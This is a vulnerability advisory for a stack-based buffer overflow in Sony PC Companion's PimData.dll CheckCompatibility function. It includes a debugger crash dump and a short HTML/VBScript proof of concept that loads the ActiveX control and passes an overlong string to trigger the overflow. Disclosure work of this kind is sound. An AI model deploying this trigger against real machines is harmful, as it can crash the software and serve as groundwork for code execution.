Sony PC Companion 2.1 (CheckCompatibility()) Stack-based Unicode Buffer Overload
Vendor: Sony Mobile Communications AB
Product web page:
Affected version: 2.10.115 (Production 27.1, Build 830)
2.10.108 (Production 26.1, Build 818)
Summary: PC Companion is a computer application that acts as a portal
to Sony Xperia and operator features and applications, such as phone
software updates, management of contacts and calendar, media management
with Media Go, and a backup and restore feature for your phone content.
Desc: The vulnerability is caused due to a boundary error in PimData.dll
when handling the value assigned to the 'OrgHeartBeat' item in the
CheckCompatibility function and can be exploited to cause a stack-based
buffer overflow via an overly long string which may lead to execution of
arbitrary code on the affected machine.
(1214.1688): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=5fcf2b80 ecx=75b1de28 edx=0012e12d esi=00000000 edi=001f9ec4
eip=75b1dca5 esp=0012e374 ebp=0012e3f0 iopl=0 nv up ei pl zr na pe nc
cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00000246
75b1dca5 ccint 3
0:000> d edi
001f9ec441 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A.
001f9ed441 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A.
001f9ee441 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A.
001f9ef441 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A.
001f9f0441 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A.
001f9f1441 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A.
001f9f2441 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A.
001f9f3441 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A.
Tested on: Microsoft Windows 7 Ultimate SP1 (EN) 32bit
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Advisory ID: ZSL-2012-5119
Advisory URL:
<object classid='clsid:A70D160E-E925-4207-803B-A0D702BEDF46' id='overrun' />
<script language='vbscript'>
targetFile = "C:\Program Files\Sony\Sony PC Companion\PimData.dll"
prototype= "Function CheckCompatibility ( ByVal OrgHeartBeat As String ,ByVal OrgScriptFile As String ,ByVal DataTypes As Long ) As Boolean"
memberName = "CheckCompatibility"
progid = "PimDataLib.PhoneDataProviderInfo"
argCount = 3
OrgHeartBeat=String(4116, "A")
overrun.CheckCompatibility OrgHeartBeat, OrgScriptFile, DataTypes